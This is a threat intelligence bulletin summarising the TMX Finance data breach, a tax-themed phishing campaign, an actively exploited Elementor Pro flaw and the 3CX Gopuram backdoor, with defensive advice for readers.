Malware Activity
TMX Finance Discloses Data Breach Impacting 4.8 Million Individuals
TMX Finance (TMX), along with a portion of its subsidiaries, collectively disclosed a data breach following a cyberattack that was discovered on February 13, 2023, after suspicious activity was observed. TMX's impacted subsidiaries consist of TitleMax (a leading car title loan company in the United States), TitleBucks (a company specializing in car title-secured loans or pawns as well as in-store or online personal loans), and InstaLoan (a fast-approval personal loan service). An investigation into this activity concluded that an unauthorized third-party gained access to TMX systems on December 10, 2022, and data of approximately 4.8 million individuals were exfiltrated between February 3 and February 14, 2023. The company's data breach notice explains that the exfiltrated data includes names, dates of birth, passport numbers, driver's license numbers, federal/state identification card numbers, tax identification numbers, Social Security numbers (SSNs), financial account information, and additional data such as phone numbers, email addresses, and physical addresses. The actor responsible for the cyberattack and data breach of TMX has yet to claim responsibility, and TMX has not publicly attributed the attack to a specific threat group as of April 4, 2023. CTIX will continue to monitor the TMX Finance data breach and provide updates when available.
- The Record: TMX Finance Data Breach Article
- Office of the Maine Attorney General: TMX Finance Data Breach Notification Listing
Threat Actor Activity
Tactical Octopus Actors Target Users Ahead of Tax Deadlines
Recently, threat actors operating out of the Tactical Octopus organization have been observed targeting individuals throughout the United States with tax-themed phishing emails. These carefully crafted phishing emails utilize lure documents such as real estate contracts, I-9 forms, and W-2 forms to entice users into unknowingly downloading malicious payloads to their devices. The malicious code executes once the user extracts an attached password protected .ZIP archive containing a malicious LNK file that enables the download of a .VBS (Visual Basic Script) file. During execution of the .VSB file, the malicious code will reach out to an actor-controlled command-and-control (C2) server to pull down additional payloads to the system. Heavily obfuscated to evade anti-virus applications, these malware files contain several lines of unrelated comments and phrases to throw off detection algorithms. Furthermore, additional obfuscated PowerShell commands are executed on the system and show relation to code structures from a range of well-known malware such as Cobalt Strike and the "Kovter" RAT. IP addresses observed from C2 communications and malicious code show ties to Russian-hosted Internet Service Providers (ISP), alongside some United States ISPs. CTIX urges users to validate the integrity of email correspondence prior to downloading any attachments or visiting embedded hyperlinks. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
Actively Exploited Flaw in WordPress Plugin Allows for Full Site Takeover
Hackers are actively exploiting a critical vulnerability in Elementor Pro, a popular website builder plugin for WordPress with at least 11 million installs. The flaw was discovered by a researcher from NinTechNet, who published a working proof-of-concept (PoC) exploit at the end of March 2023. The exploit only affects instances of Elementor Pro that are running on a website that has WooCommerce activated. WooCommerce is a very popular open-source software solution used to turn websites into e-commerce shops online. The exploit stems from a broken access control vulnerability that allows any authenticated users visiting the website to make changes to the website's settings, potentially allowing the attacker to conduct a full takeover of the site. If successfully exploited, an authenticated attacker could elevate their privileges to make themselves a website administrator. This would allow them to carry out a number of malicious activities including redirecting all user traffic to an actor-controlled command-and-control (C2) server, as well as uploading backdoors and other malicious code. This vulnerability impacts v3.11.6 and earlier, and CTIX analysts recommend all site administrators leveraging vulnerable instances of Elementor Pro and WooCommerce to upgrade to version 3.11.7 or later as soon as possible.
Honorable Mention
3CX Breach Widens as Second-Stage Backdoor Drops
UPDATE: The adversary targeting 3CX in a supply-chain attack has employed a second-stage backdoor by exploiting CVE-2013-3900, a ten (10) year-old Windows vulnerability. The threat actor has been observed delivering their full-fledged modular backdoor to only a few select companies. This versatile backdoor known as "Gopuram" was deployed on less than ten (10) devices, primarily belonging to cryptocurrency companies. It is still believed that the Lazarus group, a North Korean state-sponsored hacking group, was behind the initial 3CX attack. The precision of the attacks and their specific aim at cryptocurrency companies further ties the North Korean government-backed hackers to the crime, as the sanctions-hit government has a history of targeting cryptocurrencies and other illicit financial assets to help fund their cyber operations. This deployment of a second backdoor aimed specifically at crypto targets helps clarify the intent of the initial attackers and suggests that this was the final payload of the attack chain.
- Security Week: 3CX Backdoor Article
- The Hacker News: 3CX Backdoor Article
- Bleeping Computer: 3CX Backdoor Article
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.
